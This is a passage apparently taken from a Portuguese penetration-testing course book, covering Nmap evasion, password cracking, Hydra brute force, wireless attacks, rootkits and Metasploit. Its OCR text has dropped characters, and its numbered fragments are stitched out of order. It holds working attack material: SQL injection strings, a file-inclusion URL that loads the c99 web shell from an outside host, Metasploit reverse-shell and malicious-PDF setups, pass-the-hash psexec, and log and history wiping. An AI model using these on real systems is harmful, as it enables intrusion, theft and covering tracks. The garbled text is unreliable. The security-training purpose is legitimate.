107. b sico de relat rio de teste de invas o Cap tulo 3 Escrita de Relat rio 42 3 2 O que um relat rio Um relat rio um conjunto de informa es utilizado para reportar resultados parciais ou totais de uma determinada atividade experimento projeto a o pesquisa ou outro evento esteja finalizado ou ainda em andamento No caso de um teste de invas o necess rio gerarmos um relat rio final contendo todos os passos realizados comandos e programas utilizados al m dos resultados obtidos e a avalia o dos mesmos 3 3 O que deve conter no relat rio A estrutura b sica de um relat rio de teste de invas o deve respeitar ao menos os seguintes t picos Capa Onde deve estar presente o n vel de confidencialidade do documento Deve apresentar tamb m o nome do contratado e do contratante Outra informa o importante o nome da pessoa ao qual o relat rio est sendo endere ado sendo o representante da contratante como exposto no contrato de presta o de servi os ndice Facilitar a compreens o das se es existentes no relat rio e possibilitar a busca posterior por t picos espec ficos constantes no relat rio Deve ser o mais detalhado poss vel Classifica o do n vel de confidencialidade do documento Nesta se o importante citar novamente o n vel de confidencialidade do Cap tulo 3 Escrita de Relat rio 43 documento destacando a quem o documento e
108. bugging Cap tulo 21 Desafios Testes de Invas o 271 OS DETECTION O Enable OS detection osscan limit Limit OS detection to promising targets osscan guess Guess OS more aggressively TIMING AND PERFORMANCE Options which take lt time gt are in milliseconds unless you append s seconds m minutes or h hours to the value e g 30m T 0 5 Set timing template higher is faster min hostgroup max hostgroup lt size gt Parallel host scan group sizes min parallelism max parallelism lt time gt Probe parallelization min rtt timeout max rtt timeout initial rtt timeout lt time gt Specifies probe round trip time max retries lt tries gt Caps number of port scan probe retransmissions host timeout lt time gt Give up on target after this long scan delay max scan delay lt time gt Adjust delay between probes FIREWALL IDS EVASION AND SPOOFING f mtu lt val gt fragment packets optionally w given MTU D lt decoyl decoy2 ME gt Cloak a scan with decoys S lt IP_Address gt Spoof source address e lt iface gt Use specified interface g source port lt portnum gt Use given port number data length lt num gt Append random data to sent packets ttl lt val gt Set IP time to live field spoof mac lt mac add prefix vendor name gt Spoof your MAC address badsum Send packets with a bogus TCP UDP checksum OUTPUT oN lt file gt Output sca
109. c definir um nome diferente para a sess o especifique o nome dela na linha de comando Cap tulo 12 T cnicas de For a Bruta 141 junto com esta op o A sess o fica gravada na home do John em um arquivo chamado john rec session NOME Define o nome da sess o que pode ser utilizado com a op o restore A esse nome ser automaticamente adicionado a extens o rec status NOME Mostra o status da ltima sess o ou se definido o nome da sess o da sess o especificada make charset ARQ Gera um arquivo charset para ser utilizado no modo incremental show Mostra as senhas do arquivo que voc especificou para o JtR que j foram quebradas Esta op o especialmente til quando voc tem outra inst ncia do JtR rodando test Esta op o faz um benchmark de todos os algoritmos compilados no software e os testa para saber se est o funcionando corretamente Esta op o j foi explicada anteriormente users JNome do usuario ou UID Com esta op o voc pode especificar para o JtR quais usu rio voc quer tentar quebrar a senha Voc pode utilizar o nome de usu rio ou o UID dele e pode separar v rios usu rios utilizando uma v rgula Utilizando o antes do nome do usu rio voc faz com que o John ignore aquele usu rio ou UID groups GID Faz com que o John tente quebrar apenas as senhas dos usu rios participantes de um grupo especificado ou ignor los se voc
110. ck ng nos mostrar a chave Caso ele n o consiga tente capturar mais pacotes e execute novamente 17 5 SSID Oculto Os SSID ocultos podem ser facilmente detectados atrav s de sniffers uma vez que o seu nome trafegado sem criptografia em uma rede Por isso ocultar um SSID n o aumenta a seguran a de uma rede sem fio O pr prio aircrack utilizando o airodump j nos mostra todos os SSID incluindo os ocultos Caso um SSID n o seja exibido podemos utilizar a t cnica de solicita o de deautentica o que realizaremos no ataque contra WPA para for ar um usu rio a se conectar novamente e com isso capturamos o SSID que ele enviou durante o pedido de conex o 17 6 MAC Spoofing Algumas pessoas acreditam que est o seguras ap s liberar o acesso aos seus Access Points apenas para determinados MAC Address O MAC address que um valor que vem de f brica nas nossas interfaces de redes pode ser alterado relativamente simples forjar o endere o f sico da sua placa de rede Portanto n o podemos confiar apenas nesse controle para garantir a seguran a de Cap tulo 17 Ataques a Redes Sem Fio 202 uma rede sem fio Exemplo de comando no Linux para alterar o MAC Address El ifconfig wlan0 down hw ether 00 00 00 00 01 01 E como podemos conhecer o MAC Address de um usuario de uma determinada rede Simples sniffer novamente Como exemplo podemos utilizar o airodump e ele nos mos
111. cking 51 Y Google Hacking Database http johnny ihackstuff com ghdb 4 5 Levantamento de informa es O Google a principal ferramenta para o levantamento de informa es de nosso alvo o melhor sistema p blico para utilizarmos em busca de informa es sobre qualquer coisa em rela o ao nosso alvo sites propagandas parceiros redes sociais grupos e etc Al m do Google h outros sites espec ficos que auxiliam no processo de levantamento de informa es os quais conheceremos mais adiante Um simples exemplo do que podemos encontrar no Google e que pode voltar se contra a pessoa que disponibilizou tais informa es online o seguinte digitar na caixa de busca curr culo cpf Certamente v rios resultados retornar o com links onde podemos encontrar nome completo endere o telefone CPF identidade e mais algumas informa es das pessoas que disponibilizaram seus dados na internet Tendo conhecimento de como esses dados podem ser utilizados de maneira maliciosa podemos ter mais consci ncia ao publicarmos quaisquer informa es nossas na internet 4 6 Contramedidas e Possuir uma boa pol tica referente s publica es de informa es na internet e N o deixar configura es padr o em servidores web para que os mesmos n o consigam ser identificados facilmente e Sempre analisar as informa es dispon veis sobre a empresa em sites de busca e Alertar e treinar os fu
112. combina o por qualquer raz o sinta se vontade para escolher outra combina o modo algoritmo 20 6 Contramedidas e Instalar Host IDS em todas as m quinas e Manter as regras de firewall e Network IDS bem configuradas e Gerenciar logs em servidores pr prios e bem protegidos e Gerenciar permiss es em servidores utilizando ferramentas como o SELinux por exemplo Cap tulo 20 Apagando Rastros 267 Cap tulo 21 Desafios Testes de Invas o 21 1 Objetivo e Explorar vulnerabilidades de uma aplica o WEB e escrever um pequeno relat rio sobre as mesmas A aplica o um site din mico de um Banco e Conseguir acesso ao arquivo you got the flag txt e enviar uma mensagem criptografada com a chave p blica existente no email para o instrutor contendo os passos seguidos por voc para conseguir acesso ao arquivo Cap tulo 21 Desafios Testes de Invas o 268 21 2 Desafio 1 N m quina com o IP indicado pelo instrutor h um aplica o WEB simulando o site de um banco O objetivo do desafio explorar o m ximo poss vel de vulnerabilidades encontradas na aplica o e acrescentar o resultado de suas explora es em seu relat rio final Esse desafio pretende simular a aplica o WEB de uma empresa real que tenha contratado voc para realizar um teste de invas o em seu sistema entregando um relat rio final completo com todos os passos do processo 21 3 Desafio 2 Nesse desafio
113. cs 1 packets transmitted 1 received 0 packet loss time Oms rtt min avg max mdev 1452 515 1452 515 1452 515 0 000 ms A informa o importante esta no campo TTL Time To Live A maioria dos sistemas operacionais se diferencia pelo valor retornado de TTL Veja a lista abaixo e Cyclades Normalmente 30 e Linux Normalmente 64 e Windows Normalmente 128 e Cisco Normalmente 255 e Linux iptables Normalmente 255 5 12 4 Calculando HOP Utilizando os comandos traceroute e ping conjugados para obter informacoes podemos calcular o ttl e descobrir o sistema operacional do alvo traceroute www 4linux com br traceroute to www 4linux com br 66 118 142 41 30 hops max 60 byte packets 1 192 168 0 5 192 168 0 5 0 159 ms 0 146 ms 0 147 ms c906ff01 static spo virtua com br 201 6 255 1 8 615 ms 8 617 ms 8 663 ms c906005e virtua com br 201 6 0 94 8 435 ms 8 501 ms 8 503 ms c9060006 virtua com br 201 6 0 6 8 942 ms 9 022 ms 9 031 ms c906000d virtua com br 201 6 0 13 9 431 ms 9 502 ms 13 104 ms 64 209 108 225 64 209 108 225 21 273 ms 17 076 ms 17 344 ms x OOK N DD OG WH ND Cap tulo 5 Levantamento de Informa es 69 8 border2 tge3 1 bbnet1 acs002 pnap net 64 94 0 19 175 501 ms 176 185 ms 177 297 ms 9 sagonet 2 border2 acs002 pnap net 70 42 180 150 135 368 ms 135 402 ms 136 298 ms 10 ve40 core01a tpa sagonet net 63 246 159 41 146 523 ms 146 574 ms 146 557 ms 11 gi
114. de bin rios como por exemplo um rootkit que substitui bin rios do sistemas por seus pr prios com implementa es de c digos maliciosos e Logs de comandos gt Tudo o que digitado no terminal armazenado no bash history do usu rio por exemplo Mesmo que seja apagado esse arquivo tamb m pode ser recuperado pela equipe de per cia forense e Logs de sess o gt Quando efetuamos o login e autenticamos uma sess o v lida tudo o que ocorre na mesma armazenado em logs Algumas organiza es possuem inclusive servidores exclusivos para armazenamento e gerenciamento de logs No Linux a maioria dos logs ficam armazenados em var log 20 4 T cnicas e Sobreescrita de dados gt Quando apagamos algo em um disco os dados s o apenas marcados para a dele o e n o realmente apagados Os dados marcados para a dele o s o apagados apenas quando o sistema operacional utiliza os mesmos blocos do disco para gravar novos dados realizando a sobreescrita Quanto mais vezes aquele mesmo setor for sobreescrito mais dif cil se tornar a recupera o das informa es originalmente existentes Esse m todo tamb m conhecido como wipe e Preven o de cria o de dados gt poss vel atrav s da altera o de permiss o em determinados arquivos que novos dados sejam inseridos no mesmo por exemplo Podemos citar o caso de arquivos de log que se tiver sua permiss o alterada para negar Cap tulo
115. do protocolo TCP chamada Three Way Handshake descrita na RFC 793 gt W Le SYN A D an SYN ACK N ACK De acordo com a imagem o cliente que deseja conectar se a um servidor envia um pedido de conex o ou seja no cabe alho do datagrama TCP cont m uma flag do tipo SYN O servidor que est apto a atender novas requisi es responde ent o com um datagrama TCP contendo uma flag do tipo SYN ACK O cliente ent o responde com um datagrama contendo um ACK e ent o estabelecida a conex o De acordo com a RFC 793 que define os par metros para o protocolo TCP toda porta aberta deve responder com a flag SYN ACK e toda porta fechada deve responder com uma flag RST Para identificar este comportamento vamos utilizar a ferramenta linha de comando hping3 Verificando o comportamento de um servidor com a porta 80 aberta Cap tulo 7 Varreduras ativas passivas e furtivas de rede 82 hping3 syn c 1 p 80 192 168 0 173 HPING 192 168 0 173 ethO 192 168 0 173 S set 40 headers 0 data bytes len 46 ip 192 168 0 173 ttl 128 DF id 1067 sport 80 flags SA seq 0 win 64240 rtt 4 3 ms O mesmo comando agora em uma porta fechada hping3 syn c 1 p 81 192 168 0 173 HPING 192 168 0 173 eth0 192 168 0 173 S set 40 headers 0 data bytes len 46 ip 192 168 0 173 ttl 128 id 1069 sport 81 flags RA seq 0 win 0 rtt 1 0 ms Perceba que as
116. do site como se tiv ssemos na linha de comando Como por exemplo tw http www sitevitima com menu php page http corz org corz c99 php 13 4 3 SQL Injection SQL Injection um problema que ocorre quando o programa n o filtra caracteres especiais enviados pelo usu rio antes de fazer a requisi o para o banco de dados enviando caracteres que ser o interpretados pelo banco de dados SQL Injection mais comum em aplica es web por m outros tipos aplica es tamb m Cap tulo 13 Vulnerabilidades em aplica es web 160 podem estar vulner veis Vamos analisar o trecho de c digo abaixo Select from usuarios where username username and password LEZA sy password Como ficaria a chamada no banco de dados se envi ssemos no username e password o conte do or 1 1 Reposta Select from usuarios where username or 1 1 and password or f oe ve Onde F A 7 Fecha a variavel de entrada do usuario OR Continua a express o SQL 1 1 Uma express o verdadeira Como 1 sempre igual a 1 teremos uma verdade e passaremos pela checagem Esse um tipo de dados que poder amos passar para aplicativos vulner veis e burlar o sistema de autentica o Faremos isso na pr tica com o WebGoat Exemplos de SQL Injection Y or l or 1 1 or 1 1 or
117. e svn update 19 10 Primeiros passos na utiliza o do Metasploit Abaixo vemos o console do MSF Metasploit Framework aberto que tanto pode ser executado a partir da interface web no Windows clicando em Console Ou ent o no Linux basta digitar msfconsole no console do Linux Depois de alguns segundos dependendo da velocidade de seu computador a tela de MSFConsole aparecer conforme a imagem Leve alguns momentos para explorar a tela de console digitando help no prompt msf gt Cap tulo 19 Metasploit Framework 223 Para ver os v rios exploits existentes e ter uma leve no o de sua aplicabilidade digite show exploits no prompt msf gt Veja a figura abaixo Cap tulo 19 Metasploit Framework 224 Para informa o sobre um comando em particular voc pode usar o comando de info Voc sempre poder ter certeza do comando se for til antes de voc execut lo Olhemos para informa o dispon vel para o comando lIsass ms04 011 Digite Es info windows smb ms04 011 Isass Veja abaixo o que aparecer na tela para voc El gt gt info windows smb ms04 011 Isass Name Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow Version 4511 Platform Windows Privileged Yes License Metasploit Framework License Provided by hdm lt hdm metasploit com gt Available targets Cap tulo 19 Metasploit Framework 225 Id Name O
118. e introspec o recria o automatizada de classes suporte a threading com plataforma independente e finalmente porque uma linguagem que os desenvolvedores realmente sentem prazer em usar Como resultado do uso do Ruby o c digo original foi enxugado em quase 40 entretanto algumas partes do c digo ainda est o em Assembler e C Com a vers o 3 x a licen a passou da GPL 2 para a Metasploit Framework License v1 2 mais parecida com a GPL 3 O Objetivo da nova licen a proteger o n cleo do projeto do uso comercial mas ao mesmo tempo autorizar a integra o com m dulos comerciais agregados desde que estes m dulos n o modifiquem o framework Cap tulo 19 Metasploit Framework 218 19 6 Tecnologia por detr s do Framework Librories E Tools Services Integration O n cleo do Metasploit reside no REX Ruby Extension Library que uma cole o de classes e m todos A descri o completa das classes e m todos pode ser acessada no endere o E a documenta o da API REX http framework metasploit com documents api rex index html tw http framework metasploit com documents developers guide pdf Para exemplificar algumas entre as muitas funcionalidades dessas classes do REX durante o desenvolvimento do exploit precisamos ajustar o stack pointer muitas vezes isso significa chamar determinado operador que s o espec ficos para cada plataforma como por exemplo jmp
119. e de maneira err nea causando o comprometimento do sistema da empresa Quando vamos analisar os ataques externos novamente nos deparamos com a possibilidade de comprometimentos cujos objetivos estejam vinculados espionagem industrial que apesar de ser ilegal muitas organiza es recorrem a esse expediente para n o ficar para tr s na luta pelo dom nio de mercado Outra possibilidade da origem de comprometimentos de sistemas pode ser a curiosidade ou simplesmente o desafio que representa para um cracker cujo objetivo de comprometer o sistema seja basicamente isso comprometer o sistema e poder dizer que foi ele quem fez isso Ou ent o o furto de dados que de alguma forma sejam teis para o cracker Bons exemplos desse tipo de ataques podem ser encontrados no livro A Arte de Invadir de autoria de Kevin Mitnick e Exemplo de amea a Uma chuva de granizo em alta velocidade e Exemplo de vulnerabilidade Uma sala de equipamentos com janelas de vidro e Exemplo de ataque A chuva de granizo contra as janelas de vidro O risco ser calculado considerando a probabilidade de uma chuva de granizo em alta velocidade ocorrer e atingir a janela de vidro 1 8 Mecanismos de seguran a Para mitigar ou diminuir sensivelmente as amea as podemos empregar uma s rie de dispositivos e mecanismos de seguran a sejam as amea as f sicas ou Cap tulo 1 Introdu o Seguran a da Informa o 22 l
120. e ser acessada por todos mas apenas por usu rios cadastrados que se autentiquem atrav s de algum sistema de autentica o e controle de acesso e Sem qualquer controle de permiss o entre as p ginas Isso s ocorre quando todas as sess es do site s o abertas a quem estiver navegando pelo mesmo Normalmente acontece em sites mais simples que n o manipulam informa es confidenciais e Se tiver uma sess o poss vel acessar qualquer p gina Quando h o gerenciamento de acesso e autentica o de usu rios para acessar p ginas gerada uma sess o ou cookie com a valida o do usu rio Com o usu rio validado o cliente pode acessar qualquer p gina do site de acordo com suas permiss es O que poderia ocorrer se houvesse um sequestro de sess o desse usu rio validado O atacante teria acesso todas as p ginas cuja permiss o do usu rio possibilite E se ainda utilizar a t cnica de session fixation Poder acessar as p ginas restritas sempre que quiser mesmo que a sess o original do usu rio expire 13 5 Ferramentas para explora o e FireCat conjunto de plugins para o firefox e Firebug plugin do firefox para altera o de par metro no browser cliente e WebScarab proxy que permite a captura e manipula o de par metros Cap tulo 13 Vulnerabilidades em aplica es web 169 enviados pelo navegador e Paros Proxy proxy que permite a captura de par metros enviados pelo
121. e tem como objetivo ofuscar determinadas ocorr ncias do sistema em que se encontra Normalmente um rootkit constitu do por trojans e backdoors Temos dois principais tipos de rootkits User land Os bin rios originais s o alterados por bin rios modificados alterando o fluxo normal do programa Primeiramente executado o c digo do rootkit e s ent o realizada a funcionalidade real do programa Cap tulo 10 Trojans Backdoors V rus Rootkits e Worms 121 Kernel land Adiciona c digo malicioso no kernel atrav s de LKM Loadable Kernel Module drivers inser o de c digo direto na mem ria hook de syscall table Se bem implementado praticamente imposs vel de ser detectado com o SO em execu o precisando fazer an lise da imagem Algumas das funcionalidades do Kernel land rootkit e Hide Itself O m dulo se oculta n o aparecendo na listagem de m dulos tornando assim imposs vel de descarreg lo e File Hider Todos os arquivos que possuir uma pr determinada palavra em seu nome ser o ocultos da visualiza o e Process Hider Todos os processos que possuir uma pr determinada palavra em seu nome ser o ocultos da visualiza o e Socket Backdoor Se um pacote com um tamanho predefinido contendo uma string especificada no rootkit for recebido ser iniciar um programa normalmente uma backdoor 10 5 V rus e worms V rus e worms podem ser usados para infectar e mod
122. eb falso ser montado para que a v tima acesso o No comando abaixo vamos configurar a porta na qual o servidor ficar escutando espera de uma conex o E l gt set SRVPORT 80 Havendo configurado a parte b sica do exploit precisamos configurar o que ele far ap s explorar a falha no navegador da v tima isso o payload a gt set PAYLOAD windows meterpreter reverse tcp gt set LHOST 192 168 0 83 gt set LPORT 4444 Tudo configurado funcionando bem sem nenhum erro simplesmente lan amos o exploit e aguardamos a v tima conectar em nosso servidor falso gt exploit Para conseguirmos que a v tima conecte se nada como um bom e velho ataque de engenharia social Cap tulo 19 Metasploit Framework 244 19 13 Armitage A distribui o BackTrack conta agora com mais uma op o de usabilidade do Metasploit essa nova op o a Armitage O Armitage uma GUI interface gr fica para Metasploit que torna todo o processo de explora o simplificado ao alcance de at mesmo um usu rio com pouco conhecimento em Hacking basta dar alguns cliques e pronto sistema explorado O Armitage esta dispon vel para downloads no reposit rio do BackTrack e pode ser baixado e instalado atrav s do comando apt get install armitage Lembrando que antes de instalar o armitage pode ser necess rio atualizar o reposit rio do backtrack para isso d o comand
123. ectado pois com uma simples varredura por portas abertas na m quina entregaria o hacker novas t cnicas mais avan adas tem surgido tais como backdoors que n o abrem portas mas sim ficam ouvindo portas j abertas na m quina e ent o quando detectam um tipo espec fico de dado previamente estabelecido chegando nessa porta a backdoor j sabe que o hacker que est querendo se conectar ao alvo e ent o lan a uma conex o para o computador do hacker Esse tipo de backdoor conhecido por Non listen Backdoor Tamb m podemos ter backdoors implantadas propositalmente em programas pelos programadores Existem diversos casos onde foram descobertas maneiras de acessar um programa atrav s de um login ou comando que n o estava documentado 10 3 Cavalo de Tr ia ou Trojan Horse Segundo os historiadores os gregos tentaram invadir Tr ia e sempre eram derrotados pelos troianos Ent o os gregos tiveram uma brilhante id ia de criar um cavalo de madeira onde eles iriam colocar diversos soldados e presentear os troianos como reconhecimento da potencial defesa e declara o de paz Com isso os gregos conseguiram chegar ao cora o de Tr ia sem passar pelos muros e soldados troianos Ent o enquanto os troianos comemoravam a vit ria e descansavam tranquilamente os soldados gregos sa ram do cavalo e atacaram Tr ia que acabou sendo conquistada pelos gregos Essa hist ria ficou conhecida como Cavalo de Tr ia Ent o depois de v
124. emplo do hydra sendo usado contra o servi o FTP E hydra L tmp usuarios P tmp pass o tmp resultado v 192 168 0 100 ftp VERBOSE More tasks defined than login pass pairs exist Tasks reduced to 15 Cap tulo 12 T cnicas de For a Bruta 145 Hydra v4 1 c 2004 by van Hauser THC use allowed only for legal purposes Hydra http www thc org starting at 2004 09 28 16 19 21 DATA 15 tasks 1 servers 15 login tries 1 5 p 3 1 tries per task DATA attacking service ftp on port 21 VERBOSE Resolving addresses done STATUS attack finished for 192 168 0 100 waiting for childs to finish 21 ftp host 192 168 0 100 login x password 123456 Hydra http www thc org finished at 2004 09 28 16 19 29 Em tmp usuarios temos a userlist de ftp em tmp pass temos a wordlist para os usu rios e em tmp resultado o resultado do brute force no servi o Vejamos o conte do do arquivo de sa da do brute force cat tmp resultado Hydra v4 1 run at 2004 09 28 16 19 21 on 192 168 0 100 ftp hydra L tmp usuarios P tmp pass t 15 v o tmp resultado 192 168 0 100 ftp 21 ftp host 192 168 0 100 login x password 123456 O THC Hydra tamb m pode ser usado para realizar ataques contra formularios web Para isso podemos usar a op o http post form ou http get form dependendo do m todo usado para envio dos dados pelo formulario web Vamo
125. ent Setting Required Description EXENAME Name of payload exe FILENAME planilha2 pdf The output filename INFILENAME root PLANILHA pdf The Input PDF filename OUTPUTPATH root The location to output the file Exploit target Id Name Adobe Reader v8 x v9 x Windows XP SP3 English msf exploit adobe pdf embedded exe gt Agora vamos configurar nosso payload usarei o meterpreter reverse tcp Veja imagem abaixo Es gt set PAYLOAD windows meterpreter reverse tcp gt set LHOST 192 168 0 110 gt set LPORT 4455 gt exploit O Adobe Reader v8 x v9 x Windows XP SP3 English msf exploit adobe pdf embedded exe gt set PAYLOAD windows meterpreter reverse tcp PAYLOAD gt windows meterpreter reverse tcp msf exploit adobe pdf embedded exe gt set LHOST 192 168 0 110 LHOST gt 192 168 0 110 msf exploit adobe pdf embedded exe gt set LPORT 4455 LPORT gt 4455 msf exploit adobe pdf embedded exe gt exploit Started reverse handler on 192 168 0 110 4455 Reading in root PLANILHA pdf Parsing root PLANILHA pdf Parsing Successful Using windows meterpreter reverse tcp as payload Creating planilha2 pdf file Generated output file root planilha2 pdf Exploit completed but no session was created msf exploit adobe pdf embedded exe gt Cap tulo 19 Metasploit Framework 240 Na imagem acima eu especifique meu payload windows meterpreter reverse tcp especifiquei
126. ere o e mail e etc e Dig conseguiremos informa es sobre os servidores onde o dom nio est hospedado Teremos o endere o do servidor de dom nio e de e mail por exemplo e Nslookup retornar o IP do dom nio e o nome do mesmo incluindo a porta a partir da qual o servidor est respondendo no caso do DNS a padr o a 53 e www netcraft com permite que saibamos qual sistema operacional o servidor est executando com uma proximidade pr xima da certeza Al m disso conseguiremos o nome do servidor endere o IP pa s onde o mesmo est localizado servidor de DNS e se digitarmos apenas o dom nio 4linux com br encontraremos sites relacionados ao mesmo dom nio como webclass 4linux com br por exemplo e www 123people com esse site n o busca informa es sobre dominio mas sobre pessoas Na consulta com o whois obtivemos alguns nomes e nesse site podemos consultar as refer ncias na web acerca desse nome not cias artigos postagens relevantes Cap tulo 5 Levantamento de Informa es 63 Com cada um desses comandos e sites conseguiremos algumas informa es diferentes que nos ajudar o na pr xima fase de nosso teste 5 11 Rastreamento de E mails A an lise de e mails normalmente feita pela rea de Forense Computacional Por m podemos usar um e mail para obter informa es sobre o host da pessoa quando esse n o de conhecimento do atacante e precisa ser descoberto pois
127. ername and password or password hash to 51 sf execute an arbitrary payload This module is similar to the psexec utility provided by ity Sysinternals Unfortunately this module is not able to clean up after itself The service Yi and payload file listed in the output will need to be manually removed after access has been aained The service created by this tool uses a randomly chosen name and ay Option Value plf RHOST I92 168 1 204 192 168 1 205 192 168 RPORT 445 SMBDomain WORKGROUP SMBPass 8lcbcea8a9af93bbaad3b435b51404ee SMBUser Administrator Targets 0 gt Automatic jr 1er d Use a reverse connection _ Show advanced options Launch aad QhA2ShGl ANAaasasdQhA2hGl ANAaa ahf 1891821 9N1 Agora clicamos em Launch e aguardamos receber mais Meterpreter shells via Armitage Armitage View Hosts Attacks Workspaces Help ms04 011 Isass 4 ms04 031 netdde ms05 039 pnp ms06 025 rasmans reg ms06 025 rras ms06 040 netapi ms06 066 nwapi Be BS 192 168 1 203 192 168 1 206 ms06_066_nwwks NT AUTHORITY SYSTEM NENAXPHGRLOWYSYSTEM XEN XP PATCHED ms06_070_wkssvc ms07 029 msdns zonename F ms08 067 netapi ms09 050 smb2 negotiate func i msl0 061 spoolss netidentity xtierrpcpipe IB psexec smb relay 192 168 1 201 192 168 1 205 timbuktu_plughntcommand_bof NT AUTHORITY SYSTEM XEN XP gt AUTHORITY SYSTEM XEN 2K3 FU
128. es FIN Portas fechadas enviam um pacote RST como resposta a pacotes FIN enquanto portas abertas ignoram esses pacotes Esse m todo n o funciona com a plataforma Windows uma vez que a Microsoft n o seguiu REC 973 Xmas Tree Portas fechadas enviam um pacote RST como resposta a pacotes FIN enquanto portas abertas ignoram esses pacotes As flags FIN URG e PUSH s o utilizados nos pacotes FIN que enviado ao alvo Esse m todo n o funciona com a plataforma Windows uma vez que a Microsoft n o seguiu REC 973 Null Portas fechadas enviam um pacote RST como resposta a pacotes FIN enquanto portas abertas ignoram esses pacotes Nenhuma flag ligada no pacote FIN Esse m todo n o funciona com a plataforma Windows uma vez que a Microsoft n o seguiu RFC 973 7 5 7 T lt Paranoid Sneaky Polite Normal Aggressive Insane gt Esse parametro seta a prioridade de varredura do Nmap e Paranoid TO muito lento na esperan a de prevenir a detec o pelo sistema IDS Este serializa todos os scans scanning n o paralelo e geralmente espera no m nimo 5 minutos entre o envio de pacotes e Sneaky T1 similar ao Paranoid exceto que somente espera 15 segundos entre o envio de pacotes e Polite T2 tem o significado para facilitar a carga na rede e reduzir as chances de travar a m quina Ele serializa os testes e espera no m nimo Cap tulo 7 Varreduras ativas passivas e furtivas de rede 85 0 4 segundos ent
129. escentralizada de computadores capaz de resistir a qualquer ataque localizado Foi assim que nasceu a Arpanet o embri o do que hoje chamamos internet O Tor andava meio esquecido at que a Electronic Frontier Foundation uma entidade civil que se destaca pelo vigor com que combate nos tribunais os abusos governamentais contra os direitos individuais decidiu apoiar politicamente o projeto e contribuir financeiramente para que ele cres a fique forte e consiga deixar cada vez mais gente invis vel Outro programa que trabalha junto com o TOR o privoxy que evita o envio de qualquer dado enviado pelo navegado alcance a intranet bloqueando os no caminho Isso evita que atrav s desses dados qualquer informa o do internauta seja capturada e sua localiza o descoberta TOR The Onion Router e http www torproject org Privoxy e hitp www privoxy org Cap tulo 7 Varreduras ativas passivas e furtivas de rede 90 7 10 Pr tica dirigida 7 10 1 Navegando anonimamente Acesse o site www showmyip com e veja seu endere o IP e o local de onde est acessando Instale o anon proxy E aptitude install anon proxy Entre no navegador e configure o proxy para localhost na port 4001 porta padrao do anon proxy Acesse 0 mesmo site inicial e veja se o IP esta diferente assim como o local de onde esta acessando 7 11 Contramedidas Manter regras de firewall bem configuradas evitando que dete
130. eterminado tipo de ataque 2 WPA WPA2 PSK w wordlist wpa 01 cap arquivo gerado pelo airodump ng 17 8 WPA Rainbow Tables Como j visto anteriormente sabemos que a quebra de senhas com rainbow tables muito mais r pida do que com wordlist Como o algoritmo de encripta o do protocolo WPA mais forte do que WEP necess rio utilizarmos rainbow tables para quebrar suas senhas Programa para usar rainbow tables 3 cowpatty r dump d rainbow table s SSID tw http www securitytube net Using CowPatty in Backtrack 4 video aspx Cap tulo 17 Ataques a Redes Sem Fio 204 Download de rainbow tables tw http www security database com toolswatch WPA Rainbow Tables Offensive html 17 9 Rougue Access Point Rougue Access point sao WLAN Access Points que nao estao autorizados a conectar em uma rede Um Rougue AP abre um buraco wireless na rede Um hacker pode implantar um rougue Access point ou um funcionario pode criar um problema de seguran a sem saber simplesmente conectando um Access Point desconfigurado na rede da empresa Uma vez que foi identificado um novo AP na rede sem configura o basta que configuremos a nossa interface de rede para se conectar nesse novo ambiente desprotegido gt video aspx 17 10 Wifi Phishing WiFi phishing ocorre em hotspots p blicos onde usu rios utilizam access points O atacante aprovei
131. ext len min 1 e o plaintext len max 5 ent o a string 12345 ser inclu da na tabela mas 123456 n o table index Estes quatro par metros s o mais dif ceis de chain len explicar em poucas palavras Ler e compreender chain num o artigo original de Philippe Oechslin criador do part index RainbowCrack pode ajudar a entender o significado exato O table index est relacionado ao reduce function que utilizado na rainbow table O chain len o tamanho de cada rainbow chain na rainbow table Uma rainbow chain Cap tulo 12 T cnicas de For a Bruta 149 configurada como 16 bytes a menor unidade em uma rainbow table Uma rainbow tables cont m diversas rainbow chains O chains num o n mero de rainbow chains em uma rainbow table O par metro part index determina como o start point em cada rainbow chain gerado Deve ser um n mero ou come ar com um n mero Os valores corretos de todos os par metros dependem do que voc s precisa e selecionar bons par metros requer um bom entendimento do algoritmo de time memory tradeoff Uma configura o que funciona est logo abaixo como um exemplo hash algorithm Im ntim or md5 charset alpha numeric ABCDEFGHIJKLMNOPQRSTUVWXYZ01 2345678 9 ou loweralpha numeric abcdefghijklmnopqrstuvwxyz0123456789 plaintext_len min 1 plaintext_len max 7 chain len 3800 chain num 33
132. ffing 189 Cap tulo 16 Ataques a Servidores WEB 16 1 Objetivos e Aprender como encontrar vulnerabilidades em servidores web e Conhecer diferentes as diferen as entre Apache e IIS e Descobrir como explorar as vulnerabilidades encontradas Cap tulo 16 Ataques a Servidores WEB 190 16 2 Tipos de ataques Servidores WEB normalmente s o os primeiros alvos de atacante que queira entrar numa rede que tenha uma DMZ com servidores p blicos sendo executados sejam servidores de WEB E mail FTP Banco de Dados e etc A partir do comprometimento de um servidor na DMZ fica muito mais f cil comprometer uma m quina da interna e conseguir acesso s informa es confidenciais ou comprometer a rede inteira Podemos dividir em dois grandes grupos os tipos de ataques mais lan ados contra servidores WEB 16 2 1 DoS e Jamming Networks e Flooding Service Ports e Misconfiguring Routers e Flooding Mail Servers 16 2 2 DDoS e FTP Bounce Attacks e Port Scanning Attack e Ping Flooding Attack e Smurf Attack e SYN Flooding Attack e IP Fragmentation Overlapping Fragment Attack Cap tulo 16 Ataques a Servidores WEB 191 e IP Sequence Prediction Attack e DNS Cache Poisoning e SNMP Attack e Send Mail Attack O grande risco de servidores WEB que os mesmo est o 24 horas no ar 7 dias por semana Havendo qualquer vulnerabilidade ou erro na configuracao nao ha d vida de que em um determinado momento se
133. forma o S O utilizado e a vers o do mesmo e Amap Analiza banners de servi os que est o sendo executados e informa o nome e Cap tulo 8 Enumera o de informa es e servi os 94 vers o e AutoScan Faz varredura na rede e informa hosts ativos portas abertas e servi os sendo executados Funciona atrav s de uma interface gr fica e Maltego Faz varredura de redes servi os protocolos dom nios e v rias outras op es informando de forma gr fica a rela o entres os hosts ativos e Lanmap Varre toda a rede e captura pacotes criando ao longo de sua execu o um arquivo PNG com o mapa da rede informando graficamente a rela o das m quinas encontradas e Cheops Varre toda a rede em busca de hosts ativos informando graficamente atrav s de um mapa os hosts ativos S O sendo executado portas abertas servi os sendo executados Utiliza o nmap por debaixo de sua execu o para realizar as varreduras e Nessus Atrav s de plugins espec ficos varre um determinado alvo informando as vulnerabilidades encontradas inclusive exibindo o link de onde podemos encontrar mais informa es sobre determinada vulnerabilidade e seu exploit 8 4 Pr tica dirigida 8 4 1 Capturando banner de aplica es de 